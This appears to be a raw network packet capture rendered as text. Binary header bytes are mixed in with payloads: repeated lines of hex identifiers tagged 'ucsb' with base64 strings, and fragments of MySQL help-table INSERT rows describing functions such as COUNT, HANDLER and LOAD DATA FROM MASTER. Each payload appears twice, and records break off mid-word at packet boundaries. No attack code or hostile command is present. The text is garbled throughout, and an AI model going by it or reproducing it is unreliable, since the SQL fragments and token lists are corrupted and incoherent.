00C1C2F6A9B45EB6A6CD2B202C7907ED,ucsb,MTNzEwEDA7UaNr9jbLfkcMRW9ex+dBp4cDI6bA==
FA7B8231CE6AAF3B4D2320B17EF4A7B9,ucsb,MTNzEwEDA7bVvSNKXnlXRAcbSsa356SzGpXi+A==
D0B0C8AB843C8C36DB6B56919359AF22,ucsb,MTNzEwEDA7dAAjfpLRTghUJCAYjmFinEPqFdCQ==
69DA79E2DB96475B15E13EB2450A766A,ucsb,MTNzEwEDA7jF6teWK0EU+gZSx5OWldT41KjPwg==
0D69194054F9176158CBE15E9FD58F8F,ucsb,MTNzEwEDA7lwK6lWMVW6TGg18aUOpIO6Y2azPA==
725850E55471006E85278D5299036F70,ucsb,MTNzEwEDA7oJML/ulblgIWjeNaz22ucEWchX+g==
0850B41B6D6F1A5409B1B4E970BB6D0A,ucsb,MTNzEwEDA7u6X0rnmFQBTVUrAntCjoOlpMC bbBi0`ET@/,|po0E< @@?  P2? { |eQe7Vw==
9CE0847B9E4CD0456369AF89AB6DFC88,ucsb,MTNzEwEDA7zzcoO2jD02PpTDFftLGmZhQJ4f/Q==
3B3B8FF83ED4215C25427921DA6E7910,ucsb,MTNzEwEDA71WEuYAvGLBRPEhFAryXgAHcRn5Eg==
B8FCF6E73F808EEA8067FAB8E77B546E,ucsb,MTNzEwEDA74jGQFcnaM7QrQE58mBjm64SE9tCQ==
76CDF7C1239FFBA96B5EF23E48918031,ucsb,MTNzEwEDA7/Nh5+Qm/bZxPi/Qivi7SqzEyrPxA==
3B50C04FFDDD1E968C9178D32FF01292,ucsb,MTNzEwEDA8DK1KodZXTWeiprRUKR4OAbSOmWdw==
F1D58D69DB5F9E2923DA7BB28021BF8F,ucsb,MTNzEwEDA8EMKkRdTp0bBegaQ4U2IW159Aqprg==
7268078E4076662211A12D1EE5230BD1,ucsb,MTNzEwEDA8L4I6ywUdFoJzILi/GjW3wHQKrxEg==
DB853B1986B0523DA8438AEF174D9D46,ucsb,MTNzEwEDA8MUVutgvpBmIn+5x6i9UtlEu01/LA==
68DD883FDDE6A585D8E0CCE261B3A16C,ucsb,MTNzEwEDA8TFuSMy37tfy9MeYZbj9cTwyAmthQ==
B0C1956B008925F637521D3B48934F34,ucsb,MTNzEwEDA8WEJNYiW1kBpU9mICHw2/3Zf59szA==
49A90DE376B02ED50DAC4E88FF3C53F5,ucsb,MTNzEwEDA8ZC9nPyGu/OABfJcHNP62PpJ2rf/w==
FFB8C5CD2B5F12CF3A0D07A49855C038,ucsb,MTNzEwEDA8e3ogdnBFiLGypAxOB5PhC5c4cX7A==
2194ABAC9BE58466CDF1140B2EA87B94,ucsb,MTNzEwEDA8jl/4qHrnvCehTPxR5h9NOAKwobpw==
084BC9FAE995F51D08149B1601BD8066,ucsb,MTNzEwEDA8mlyjNCf97WcSdiwgj4ohizc/I4ug==
FD51F198FD5EB713A67996C3CB7C2A80,ucsb,MTNzEwEDA8oEJNa57ytNZTFK2ytvGeAPV72f7Q==
C267BF551CF8F20332CA7109E2C63938C bbBi0`ET@/p܂Ao0E<@?x  3P)tj .  )v 0\nmysql> SELECT LENGTH(COMPRESS(\'a\'));\n -> 13\nmysql> SELECT LENGTH(COMPRESS(REPEAT(\'a\',16)));\n -> 15',''),(76,'COUNT',12,' COUNT(expr)\nReturns a count of the number of non-NULL values in the rows\nretrieved by a SELECT statement.\n','mysql> SELECT student.student_name,COUNT(*)\n -> FROM student,course\n -> WHERE student.student_id=course.student_id\n -> GROUP BY student_name;',''),(77,'INSERT',23,' INSERT(str,pos,len,newstr)\nReturns the string str, with the substring beginning at position\npos and len characters long replaced by the string\nnewstr. Returns the original string if pos is not within\nthe length of the string. Replaces the rest of the string from position\npos is len is not within the length of the rest of the string.\nReturns NULL if any argument is null.\n','mysql> SELECT INSERT(\'Quadratic\', 3, 4, \'What\');\n -> \'QuWhattic\'\nmysql> SELECT INSERT(\'Quadratic\', -1, 4, \'What\');\n -> \'Quadratic\'\nmysql> SELECT INSERT(\'Quadratic\', 3, 100, \'What\');\n -> \'QuWhat\'',''),(78,'HANDLER',6,'The HANDLER statement provides direct access to table storage engine\ninterfaces. It is available for MyISAM tables as MySQL 4.0.0 and\nInnoDB tables as of MySQL 4.0.3.\n','HANDLER C ZZBi0`EL@/܂Sŀo0E4\U@?* 3 Pu}UG$ )C bb0`BiET@/o0AE< @@@  P2? { |eQe7Vw==
9CE0847B9E4CD0456369AF89AB6DFC88,ucsb,MTNzEwEDA7zzcoO2jD02PpTDFftLGmZhQJ4f/Q==
3B3B8FF83ED4215C25427921DA6E7910,ucsb,MTNzEwEDA71WEuYAvGLBRPEhFAryXgAHcRn5Eg==
B8FCF6E73F808EEA8067FAB8E77B546E,ucsb,MTNzEwEDA74jGQFcnaM7QrQE58mBjm64SE9tCQ==
76CDF7C1239FFBA96B5EF23E48918031,ucsb,MTNzEwEDA7/Nh5+Qm/bZxPi/Qivi7SqzEyrPxA==
3B50C04FFDDD1E968C9178D32FF01292,ucsb,MTNzEwEDA8DK1KodZXTWeiprRUKR4OAbSOmWdw==
F1D58D69DB5F9E2923DA7BB28021BF8F,ucsb,MTNzEwEDA8EMKkRdTp0bBegaQ4U2IW159Aqprg==
7268078E4076662211A12D1EE5230BD1,ucsb,MTNzEwEDA8L4I6ywUdFoJzILi/GjW3wHQKrxEg==
DB853B1986B0523DA8438AEF174D9D46,ucsb,MTNzEwEDA8MUVutgvpBmIn+5x6i9UtlEu01/LA==
68DD883FDDE6A585D8E0CCE261B3A16C,ucsb,MTNzEwEDA8TFuSMy37tfy9MeYZbj9cTwyAmthQ==
B0C1956B008925F637521D3B48934F34,ucsb,MTNzEwEDA8WEJNYiW1kBpU9mICHw2/3Zf59szA==
49A90DE376B02ED50DAC4E88FF3C53F5,ucsb,MTNzEwEDA8ZC9nPyGu/OABfJcHNP62PpJ2rf/w==
FFB8C5CD2B5F12CF3A0D07A49855C038,ucsb,MTNzEwEDA8e3ogdnBFiLGypAxOB5PhC5c4cX7A==
2194ABAC9BE58466CDF1140B2EA87B94,ucsb,MTNzEwEDA8jl/4qHrnvCehTPxR5h9NOAKwobpw==
084BC9FAE995F51D08149B1601BD8066,ucsb,MTNzEwEDA8mlyjNCf97WcSdiwgj4ohizc/I4ug==
FD51F198FD5EB713A67996C3CB7C2A80,ucsb,MTNzEwEDA8oEJNa57ytNZTFK2ytvGeAPV72f7Q==
C267BF551CF8F20332CA7109E2C63938C bb0`BiET@/Ԁo0SE<@@w  3P)tj .  )v 0\nmysql> SELECT LENGTH(COMPRESS(\'a\'));\n -> 13\nmysql> SELECT LENGTH(COMPRESS(REPEAT(\'a\',16)));\n -> 15',''),(76,'COUNT',12,' COUNT(expr)\nReturns a count of the number of non-NULL values in the rows\nretrieved by a SELECT statement.\n','mysql> SELECT student.student_name,COUNT(*)\n -> FROM student,course\n -> WHERE student.student_id=course.student_id\n -> GROUP BY student_name;',''),(77,'INSERT',23,' INSERT(str,pos,len,newstr)\nReturns the string str, with the substring beginning at position\npos and len characters long replaced by the string\nnewstr. Returns the original string if pos is not within\nthe length of the string. Replaces the rest of the string from position\npos is len is not within the length of the rest of the string.\nReturns NULL if any argument is null.\n','mysql> SELECT INSERT(\'Quadratic\', 3, 4, \'What\');\n -> \'QuWhattic\'\nmysql> SELECT INSERT(\'Quadratic\', -1, 4, \'What\');\n -> \'Quadratic\'\nmysql> SELECT INSERT(\'Quadratic\', 3, 100, \'What\');\n -> \'QuWhat\'',''),(78,'HANDLER',6,'The HANDLER statement provides direct access to table storage engine\ninterfaces. It is available for MyISAM tables as MySQL 4.0.0 and\nInnoDB tables as of MySQL 4.0.3.\n','HANDLER C ZZ0`BiEL@/go0AE4\U@@* 3 Pu}UG$ )C bbBi0`ET@/p܂Ao0E<@?x  3P1tj n  )wtbl_name OPEN [ AS alias ]\nHANDLER tbl_name READ index_name { = | >= | <= | < } (value1,value2,...)\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ { FIRST | NEXT }\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name CLOSE',''),(79,'MLINEFROMTEXT',3,' MLineFromText(wkt[,srid])\n MultiLineStringFromText(wkt[,srid])\nConstructs a MULTILINESTRING value using its WKT representation and SRID.\n','',''),(80,'GEOMCOLLFROMWKB',13,' GeomCollFromWKB(wkb[,srid])\n GeometryCollectionFromWKB(wkb[,srid])\nConstructs a GEOMETRYCOLLECTION value using its WKB representation and SRID.\n','',''),(81,'RENAME TABLE',28,'RENAME TABLE tbl_name TO new_tbl_name\n [, tbl_name2 TO new_tbl_name2] ...\n\nThis statement renames one or more tables. It was added in MySQL 3.23.23.\n\nThe rename operation is done atomically, which means that no other thread\ncan access any of the tables while the rename is running. For example,\nif you have an existing table old_table, you can create another\ntable new_table that has the same structure but is empty, and then\nreplace the existing table with the empty one as follows:\n','CREATE TABLE new_table (...);\nREC bb0`BiET@/Ԁo0SE<@@w  3P1tj n  )wtbl_name OPEN [ AS alias ]\nHANDLER tbl_name READ index_name { = | >= | <= | < } (value1,value2,...)\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ { FIRST | NEXT }\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name CLOSE',''),(79,'MLINEFROMTEXT',3,' MLineFromText(wkt[,srid])\n MultiLineStringFromText(wkt[,srid])\nConstructs a MULTILINESTRING value using its WKT representation and SRID.\n','',''),(80,'GEOMCOLLFROMWKB',13,' GeomCollFromWKB(wkb[,srid])\n GeometryCollectionFromWKB(wkb[,srid])\nConstructs a GEOMETRYCOLLECTION value using its WKB representation and SRID.\n','',''),(81,'RENAME TABLE',28,'RENAME TABLE tbl_name TO new_tbl_name\n [, tbl_name2 TO new_tbl_name2] ...\n\nThis statement renames one or more tables. It was added in MySQL 3.23.23.\n\nThe rename operation is done atomically, which means that no other thread\ncan access any of the tables while the rename is running. For example,\nif you have an existing table old_table, you can create another\ntable new_table that has the same structure but is empty, and then\nreplace the existing table with the empty one as follows:\n','CREATE TABLE new_table (...);\nREC ZZBi0`EL@/܂Sŀo0E4\W@?( 3 Pu}UQĀ$ )C ZZ0`BiEL@/go0AE4\W@@( 3 Pu}UQĀ$ )Ck ffBi0`EX@/ЂSŀo0E@\.@?D 3 P{Z"l )_ ZZC ff0`BiEX@/Ԁo0  E@\.@@D 3 P{Z"l )_ ZZC bbBi0`ET@/p܂Ao0E<@?x  3P9tj K  )wNAME TABLE old_table TO backup_table, new_table TO old_table;',''),(82,'BOOLEAN',1,' BOOL\n BOOLEAN\nThese are synonyms for TINYINT(1).\nThe BOOLEAN synonym was added in MySQL 4.1.0.\nA value of zero is considered false. Non-zero values are considered true.\n\nIn the future,\nfull boolean type handling will be introduced in accordance with standard SQL.\n','',''),(83,'DEFAULT',21,' DEFAULT(col_name)\nReturns the default value for a table column.\nStarting from MySQL 5.0.2, you get an error if the column doesn\'t have\na default value.\n','mysql> UPDATE t SET i = DEFAULT(i)+1 WHERE id < 100;',''),(84,'TINYTEXT',1,' TINYTEXT\n\nA TEXT column with a maximum length of 255\n(2^8 - 1) characters.\n','',''),(85,'DECODE',17,' DECODE(crypt_str,pass_str)\nDecrypts the encrypted string crypt_str using pass_str as the\npassword. crypt_str should be a string returned from\nENCODE().\n','',''),(86,'<=>',26,' <=>\nNULL-safe equal.\nThis operator performs an equality comparison like the = operator, but\nreturns 1 rather than NULL if both operands are NULL,\nand 0 rather than NULL if one operand is NULL.\n','mysql> SELECT 1 <=> 1, NULL <=> NULL, 1 <=> NULL;\n -> 1, 1, 0\nmysql> SELECT 1 = 1, NULL = NULL, 1 = NULL;\n -> 1, NULL, NULL',''),(87,'LOAD DATA FROM C ZZBi0`EL@/Ao0E4.@?  oP K$}_ eqC bb0`BiET@/Ԁo0SE<@@w  3P9tj K  )wNAME TABLE old_table TO backup_table, new_table TO old_table;',''),(82,'BOOLEAN',1,' BOOL\n BOOLEAN\nThese are synonyms for TINYINT(1).\nThe BOOLEAN synonym was added in MySQL 4.1.0.\nA value of zero is considered false. Non-zero values are considered true.\n\nIn the future,\nfull boolean type handling will be introduced in accordance with standard SQL.\n','',''),(83,'DEFAULT',21,' DEFAULT(col_name)\nReturns the default value for a table column.\nStarting from MySQL 5.0.2, you get an error if the column doesn\'t have\na default value.\n','mysql> UPDATE t SET i = DEFAULT(i)+1 WHERE id < 100;',''),(84,'TINYTEXT',1,' TINYTEXT\n\nA TEXT column with a maximum length of 255\n(2^8 - 1) characters.\n','',''),(85,'DECODE',17,' DECODE(crypt_str,pass_str)\nDecrypts the encrypted string crypt_str using pass_str as the\npassword. crypt_str should be a string returned from\nENCODE().\n','',''),(86,'<=>',26,' <=>\nNULL-safe equal.\nThis operator performs an equality comparison like the = operator, but\nreturns 1 rather than NULL if both operands are NULL,\nand 0 rather than NULL if one operand is NULL.\n','mysql> SELECT 1 <=> 1, NULL <=> NULL, 1 <=> NULL;\n -> 1, 1, 0\nmysql> SELECT 1 = 1, NULL = NULL, 1 = NULL;\n -> 1, NULL, NULL',''),(87,'LOAD DATA FROM C ZZ0`BiEL@/o0a<E4.@@  oP K$}_ eqC> bbBi0`ET@/p܂Ao0E<@?x  3PAtj f-  )wMASTER',6,'LOAD DATA FROM MASTER\n\nTakes a snapshot of the master and copies it to the slave. It updates the\nvalues of MASTER_LOG_FILE and MASTER_LOG_POS so that the slave\nstarts replicating from the correct position. Any table and database\nexclusion rules specified with the --replicate-*-do-* and\n--replicate-*-ignore-* options are honored.\n--replicate-rewrite-db is /not/ taken into account (because one user\ncould, with this option, set up a non-unique mapping such as\n--replicate-rewrite-db=db1->db3 and\n--replicate-rewrite-db=db2->db3, which would confuse the slave when\nit loads the master\'s tables).\n\nUse of this statement is subject to the following conditions:\n\n\n --- It works only with MyISAM tables. Attempting to load a\nnon-MyISAM table results in the error:\n\nERROR 1189 (08S01): Net error reading from master\n\n --- It acquires a global read lock on the master while taking the snapshot,\nwhich prevents updates on the master during the load operation.\n\n\nIn the future, it is planned to make this statement work with\nInnoDB tables and to remove the need for a global read lock by using\nnon-blocking online backup.\n\nIf you are loading big tables, you might have to increase the values\nof net_read_timeout and net_write_timeout\non both your mastCY bb0`BiET@/Ԁo0SE<@@w  3PAtj f-  )wMASTER',6,'LOAD DATA FROM MASTER\n\nTakes a snapshot of the master and copies it to the slave. It updates the\nvalues of MASTER_LOG_FILE and MASTER_LOG_POS so that the slave\nstarts replicating from the correct position. Any table and database\nexclusion rules specified with the --replicate-*-do-* and\n--replicate-*-ignore-* options are honored.\n--replicate-rewrite-db is /not/ taken into account (because one user\ncould, with this option, set up a non-unique mapping such as\n--replicate-rewrite-db=db1->db3 and\n--replicate-rewrite-db=db2->db3, which would confuse the slave when\nit loads the master\'s tables).\n\nUse of this statement is subject to the following conditions:\n\n\n --- It works only with MyISAM tables. Attempting to load a\nnon-MyISAM table results in the error:\n\nERROR 1189 (08S01): Net error reading from master\n\n --- It acquires a global read lock on the master while taking the snapshot,\nwhich prevents updates on the master during the load operation.\n\n\nIn the future, it is planned to make this statement work with\nInnoDB tables and to remove the need for a global read lock by using\nnon-blocking online backup.\n\nIf you are loading big tables, you might have to increase the values\nof net_read_timeout and net_write_timeout\non both your mastC bbBi0`ET@/,|po0E< A@?  P2?  }eU,ucsb,MTNzEwEDA8s5k2UpWUs8EfodQTmROlSBkJQ7CQ==
EF118EBA81F25078F04F2376F6D78CE7,ucsb,MTNzEwEDA8w4UlsmzEE1X4VDrXoZcVESUpNodw==
94E84A22D014AECF27C6FCAFFC8C4527,ucsb,MTNzEwEDA85i75sSWctGNpNAYyQaS7Ot2Dti0A==
6D6F502B2D8A48CE11BEE0B11804A73C,ucsb,MTNzEwEDA88epXP5Dx4fWacMwcnhoKjMXknYqA==
D90C42A4D5AC0920CE8E37F19F85159D,ucsb,MTNzEwEDA9A2nzj/eohnOoyM85Tz1FxhF/teDg==
6EED6EEB03FCEFB773DAFDA67688C91D,ucsb,MTNzEwEDA9GhIPtafM5+vlLImVRmgmiQydnv8A==
19ACE568C0B990DA4583EFC325D4DA41,ucsb,MTNzEwEDA9IWsC+OZ4oZGsWr6AcZ21H53th1eA==
C5291684F34D19D69E0A744A3D7BFC9E,ucsb,MTNzEwEDA9P4U6sWy21ss2E3e+Q3v4ml5wGxwg==
8048ADA03B04ABC1D6B8D756903253D5,ucsb,MTNzEwEDA9T4HrpG9UXBz/dMXyILdU4IXN2YKw==
8AB9F935491BBB1FC9E9B1CE2A1F76CC,ucsb,MTNzEwEDA9Ui4vq8ym5LuEHg89bYW5wJkI6JwQ==
6B59800F931979AEF189E878C05C6ADC,ucsb,MTNzEwEDA9bO32wctvffCy14CJYxuJPbPxhw+w==
E84F1D6F8DE3091A1A88B026503CE420,ucsb,MTNzEwEDA9fTQnpy27Smvo9tPiy/Vx5ExM1KQw==
CD3CA3B096A45240A6366EB1724CE1B1,ucsb,MTNzEwEDA9jaOc8TXJyf8PURveflMRfV2Y+SDA==
6EE05B9D5B96FD4E5C068CBF50645684,ucsb,MTNzEwEDA9l0NmPFXwfWviuuzL0krh2dqYl/jQ==
567559B86796A2820663C64D14616DF9,ucsb,MTNzEwEDA9oUe1XzZJbD/NqYBa8sZzlw831rHw==
13E1CB29B6D111F1C55D84667802909B,ucsb,MTNzEwEDA9v7xYtKQ83VuE9doQlAwwibnJRhcC bb0`BiET@/o0AE< A@@  P2?  }eU,ucsb,MTNzEwEDA8s5k2UpWUs8EfodQTmROlSBkJQ7CQ==
EF118EBA81F25078F04F2376F6D78CE7,ucsb,MTNzEwEDA8w4UlsmzEE1X4VDrXoZcVESUpNodw==
94E84A22D014AECF27C6FCAFFC8C4527,ucsb,MTNzEwEDA85i75sSWctGNpNAYyQaS7Ot2Dti0A==
6D6F502B2D8A48CE11BEE0B11804A73C,ucsb,MTNzEwEDA88epXP5Dx4fWacMwcnhoKjMXknYqA==
D90C42A4D5AC0920CE8E37F19F85159D,ucsb,MTNzEwEDA9A2nzj/eohnOoyM85Tz1FxhF/teDg==
6EED6EEB03FCEFB773DAFDA67688C91D,ucsb,MTNzEwEDA9GhIPtafM5+vlLImVRmgmiQydnv8A==
19ACE568C0B990DA4583EFC325D4DA41,ucsb,MTNzEwEDA9IWsC+OZ4oZGsWr6AcZ21H53th1eA==
C5291684F34D19D69E0A744A3D7BFC9E,ucsb,MTNzEwEDA9P4U6sWy21ss2E3e+Q3v4ml5wGxwg==
8048ADA03B04ABC1D6B8D756903253D5,ucsb,MTNzEwEDA9T4HrpG9UXBz/dMXyILdU4IXN2YKw==
8AB9F935491BBB1FC9E9B1CE2A1F76CC,ucsb,MTNzEwEDA9Ui4vq8ym5LuEHg89bYW5wJkI6JwQ==
6B59800F931979AEF189E878C05C6ADC,ucsb,MTNzEwEDA9bO32wctvffCy14CJYxuJPbPxhw+w==
E84F1D6F8DE3091A1A88B026503CE420,ucsb,MTNzEwEDA9fTQnpy27Smvo9tPiy/Vx5ExM1KQw==
CD3CA3B096A45240A6366EB1724CE1B1,ucsb,MTNzEwEDA9jaOc8TXJyf8PURveflMRfV2Y+SDA==
6EE05B9D5B96FD4E5C068CBF50645684,ucsb,MTNzEwEDA9l0NmPFXwfWviuuzL0krh2dqYl/jQ==
567559B86796A2820663C64D14616DF9,ucsb,MTNzEwEDA9oUe1XzZJbD/NqYBa8sZzlw831rHw==
13E1CB29B6D111F1C55D84667802909B,ucsb,MTNzEwEDA9v7xYtKQ83VuE9doQlAwwibnJRhcC9 bbBi0`ET@/,|po0E< B@?  P2? = ~eUw==
C11B10368841BD22741DB04BB6F7D814,ucsb,MTNzEwEDA9zn6P4bxyG2cqYKu4uJFktjUk2MKw==
0D33B1F75D283043BAEFBAF5AEA25D80,ucsb,MTNzEwEDA930nbikOUPpv1wwasH41umAEUwTVw==
8CA4A6BD872A7E239C584C330C3A3344,ucsb,MTNzEwEDA97UdywYxjotAZHB0O1bwtSnL+xn3w==
C958815D32E03D3F1F6238243F3F2257,ucsb,MTNzEwEDA98q/Oh2eiRDBrT5sxt/AOb5QxBSlQ==
5D4C6D2F52B2905E752A9D8977E73291,ucsb,MTNzEwEDA+B/C6uM7lkz/SxRff00OmrWAXAlBw==
D9E2D5CDF8B5368EA9B9BE139FFDE62C,ucsb,MTNzEwEDA+HuaLXq4L1JHEhChrPclo0M63Yw7w==
01CFF84072851B18E06E1094047146D3,ucsb,MTNzEwEDA+KXI0Bp2SRa27GyMjL65vo3yer2xg==
666BF6EA7BE2139C26A31957C4DC7898,ucsb,MTNzEwEDA+MWwB0N8p/SAd5ru4SKlTTiPwBV3w==
8C4CDBD7CA803CB388C8E120A4796931,ucsb,MTNzEwEDA+SOjE126zJRr+Lxv1frTAXR4HB5UA==
5A0DE8BCA1922ED34072EBA36B424805,ucsb,MTNzEwEDA+UZhYOFj629fLbeO6fmoCW5dOzZrA==
28DA0FE6E02726624684E7FDE0CDCE14,ucsb,MTNzEwEDA+bRx2RB3DcSkljwWan1ORdPyS9DCg==
4fda E32B4A2CA0681249BD967551F48E472C,ucsb,MTNzEwEDA+fcDG4YwymTu5VAUueLI+um70P4KQ==
EBDB2FA27E95E4CD5AD8D7A8ED1B37F4,ucsb,MTNzEwEDA+iIgqB6ogW0crYesllYbP+ihqqMiw==
E510F4F5A10E299F4754A77BD9CA0210,ucsb,MTNzEwEDA+m84twmkjBnEeXUwDVvYcHtSlNFgQ==
D9B102954C669657B66FF7E420A4E2FC,ucsb,MTNzEwEDA+qxfAjwD2BBps7mJkHgKVL10rdcLA==
BA789FDDB7CAB36286D61DAB927CB ZZBi0`EL@/܂Sŀo0E4\Y@?& 3 Pu}U[Ԁ$ )C[ bb0`BiET@/o0AE< B@@  P2? = ~eUw==
C11B10368841BD22741DB04BB6F7D814,ucsb,MTNzEwEDA9zn6P4bxyG2cqYKu4uJFktjUk2MKw==
0D33B1F75D283043BAEFBAF5AEA25D80,ucsb,MTNzEwEDA930nbikOUPpv1wwasH41umAEUwTVw==
8CA4A6BD872A7E239C584C330C3A3344,ucsb,MTNzEwEDA97UdywYxjotAZHB0O1bwtSnL+xn3w==
C958815D32E03D3F1F6238243F3F2257,ucsb,MTNzEwEDA98q/Oh2eiRDBrT5sxt/AOb5QxBSlQ==
5D4C6D2F52B2905E752A9D8977E73291,ucsb,MTNzEwEDA+B/C6uM7lkz/SxRff00OmrWAXAlBw==
D9E2D5CDF8B5368EA9B9BE139FFDE62C,ucsb,MTNzEwEDA+HuaLXq4L1JHEhChrPclo0M63Yw7w==
01CFF84072851B18E06E1094047146D3,ucsb,MTNzEwEDA+KXI0Bp2SRa27GyMjL65vo3yer2xg==
666BF6EA7BE2139C26A31957C4DC7898,ucsb,MTNzEwEDA+MWwB0N8p/SAd5ru4SKlTTiPwBV3w==
8C4CDBD7CA803CB388C8E120A4796931,ucsb,MTNzEwEDA+SOjE126zJRr+Lxv1frTAXR4HB5UA==
5A0DE8BCA1922ED34072EBA36B424805,ucsb,MTNzEwEDA+UZhYOFj629fLbeO6fmoCW5dOzZrA==
28DA0FE6E02726624684E7FDE0CDCE14,ucsb,MTNzEwEDA+bRx2RB3DcSkljwWan1ORdPyS9DCg==
4fda E32B4A2CA0681249BD967551F48E472C,ucsb,MTNzEwEDA+fcDG4YwymTu5VAUueLI+um70P4KQ==
EBDB2FA27E95E4CD5AD8D7A8ED1B37F4,ucsb,MTNzEwEDA+iIgqB6ogW0crYesllYbP+ihqqMiw==
E510F4F5A10E299F4754A77BD9CA0210,ucsb,MTNzEwEDA+m84twmkjBnEeXUwDVvYcHtSlNFgQ==
D9B102954C669657B66FF7E420A4E2FC,ucsb,MTNzEwEDA+qxfAjwD2BBps7mJkHgKVL10rdcLA==
BA789FDDB7CAB36286D61DAB927Cm ZZ0`BiEL@/go0AE4\Y@@& 3 Pu}U[Ԁ$ )C bbBi0`ET@/p܂Ao0E<@?x  3P Itj ~Y  )wer and slave servers.\nSee also : [Server system variables].\n\nNote that LOAD DATA FROM MASTER does /not/ copy any\ntables from the mysql database. This makes it easy to have\ndifferent users and privileges on the master and the slave.\n\nThe LOAD DATA FROM MASTER statement\nrequires the replication account that is used to connect to the master\nto have the RELOAD and SUPER privileges on the master and the\nSELECT privilege for all master tables you want to load. All\nmaster tables for which the user does not have the SELECT privilege are\nignored by LOAD DATA FROM MASTER. This is because the\nmaster hides them from the user: LOAD DATA FROM MASTER calls\nSHOW DATABASES to know the master databases to load, but\nSHOW DATABASES returns only databases for which the user has\nsome privilege.\nSee [SHOW DATABASES, , SHOW DATABASES].\nOn the slave\'s side, the user that issues LOAD DATA FROM MASTER should\nhave grants to drop and create the databases and tables that are copied.\n','',''),(88,'RESET',6,'The RESET statement is used to clear the state of various server\noperations. It also acts as a stronger\nversion of the FLUSH statement. See also : [FLUSH, , FLUSH].\n','RESET reset_option [, reset_option] ...',''),(89,'GET_LOCK',21,' GET_LOCK(str,timeout)\nTries to obC ZZBi0`EL@/uAo0E4@?mz  3PR% I  )xC bb0`BiET@/Ԁo0SE<@@w  3P Itj ~Y  )wer and slave servers.\nSee also : [Server system variables].\n\nNote that LOAD DATA FROM MASTER does /not/ copy any\ntables from the mysql database. This makes it easy to have\ndifferent users and privileges on the master and the slave.\n\nThe LOAD DATA FROM MASTER statement\nrequires the replication account that is used to connect to the master\nto have the RELOAD and SUPER privileges on the master and the\nSELECT privilege for all master tables you want to load. All\nmaster tables for which the user does not have the SELECT privilege are\nignored by LOAD DATA FROM MASTER. This is because the\nmaster hides them from the user: LOAD DATA FROM MASTER calls\nSHOW DATABASES to know the master databases to load, but\nSHOW DATABASES returns only databases for which the user has\nsome privilege.\nSee [SHOW DATABASES, , SHOW DATABASES].\nOn the slave\'s side, the user that issues LOAD DATA FROM MASTER should\nhave grants to drop and create the databases and tables that are copied.\n','',''),(88,'RESET',6,'The RESET statement is used to clear the state of various server\noperations. It also acts as a stronger\nversion of the FLUSH statement. See also : [FLUSH, , FLUSH].\n','RESET reset_option [, reset_option] ...',''),(89,'GET_LOCK',21,' GET_LOCK(str,timeout)\nTries to obC ZZ0`BiEL@/܀o0SE4@@lz  3PR% I  )xC bbBi0`ET@/,|po0E< C@?  P2 ? [ ~eW6146F,ucsb,MTNzEwEDA+v70Pbbsb9N5sqyNhHgsO1XTfgRWQ==
116A4F475227A4DDE225F5F9C0704706,ucsb,MTNzEwEDA+xd65Bmmu+mp3kkaVoBv3eMF/lRnQ==
576135A6B32EC658A2E7A7DAC3294280,ucsb,MTNzEwEDA+1SJzuGq/lmIuaS0BM4AaWZrDbQtg==
52AF6F567A824D1878F07828EF8279B9,ucsb,MTNzEwEDA+4F1BjuzdkKsVavjjMp3UipTNbsSg==
9CFFE218136810806EB327FD4956D9BE,ucsb,MTNzEwEDA+8NeN/p10SShoEP4CmT+MAsoxqdnQ==
779AC4132BD6BC95BCAD7236A1D6D73E,ucsb,MTNzEwEDA/CkdcWjp5AT4gLR7guUWhapbuoxvQ==
5F19BD0AFF31AA976B6D26944997F440,ucsb,MTNzEwEDA/HBFO8xOQO8/ohJXwSQ7MqvVccyMA==
394CAF6449A716906FE2B39CAB2F1444,ucsb,MTNzEwEDA/KQlZo5+GZmyyxQ/CS++3fRMjyDAQ==
2CF3725F81DB0BCD31EF36B8BFAC1537,ucsb,MTNzEwEDA/OOkLx/jA80ENagnZ0Y7SWFDvYRcg==
883A4010DCBC6FEA1172E719608A1359,ucsb,MTNzEwEDA/TEFvtrdLvO+xU0tWmvJIhtH2YpWg==
DEC9B93AE3631C8BA5FE9B990F8414E6,ucsb,MTNzEwEDA/XGAMrszXleherCQOIAht4yCuiacA==
DD9EA85BDF8BB8370B50E8F7C4FDEFA3,ucsb,MTNzEwEDA/ZWYVaQPaU+oRWoFW3MoPU3bBP1kA==
56429B4EF177659F0E6A8B6ED3F64402,ucsb,MTNzEwEDA/fQTTfyeNP4iS81tmp+Ou0KSkgFQA==
C96FD66A53152DFFEB4E8E8E32EF704B,ucsb,MTNzEwEDA/hK34pw1Yjy4rlqOsMHNvX55Nts9w==
479EEC0AE1F3B14F8425154671FF98C5,ucsb,MTNzEwEDA/mgBPH9M89gB4UsMyrU0HuLyuczFA==
9AA8D7FFCB7FE7F5F5E2085DACCAC550,ucsb,MTNzEwEDA/q8hoJjhqFq5PfJj14FwLTlC bb0`BiET@/o0AE< C@@  P2 ? [ ~eW6146F,ucsb,MTNzEwEDA+v70Pbbsb9N5sqyNhHgsO1XTfgRWQ==
116A4F475227A4DDE225F5F9C0704706,ucsb,MTNzEwEDA+xd65Bmmu+mp3kkaVoBv3eMF/lRnQ==
576135A6B32EC658A2E7A7DAC3294280,ucsb,MTNzEwEDA+1SJzuGq/lmIuaS0BM4AaWZrDbQtg==
52AF6F567A824D1878F07828EF8279B9,ucsb,MTNzEwEDA+4F1BjuzdkKsVavjjMp3UipTNbsSg==
9CFFE218136810806EB327FD4956D9BE,ucsb,MTNzEwEDA+8NeN/p10SShoEP4CmT+MAsoxqdnQ==
779AC4132BD6BC95BCAD7236A1D6D73E,ucsb,MTNzEwEDA/CkdcWjp5AT4gLR7guUWhapbuoxvQ==
5F19BD0AFF31AA976B6D26944997F440,ucsb,MTNzEwEDA/HBFO8xOQO8/ohJXwSQ7MqvVccyMA==
394CAF6449A716906FE2B39CAB2F1444,ucsb,MTNzEwEDA/KQlZo5+GZmyyxQ/CS++3fRMjyDAQ==
2CF3725F81DB0BCD31EF36B8BFAC1537,ucsb,MTNzEwEDA/OOkLx/jA80ENagnZ0Y7SWFDvYRcg==
